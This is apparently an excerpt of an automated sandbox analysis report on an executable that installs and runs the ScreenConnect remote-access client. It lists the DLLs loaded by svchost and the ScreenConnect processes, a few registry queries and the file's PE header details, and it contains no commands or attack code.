                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Qjq85KfhBC.exeStatic PE information: certificate valid
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
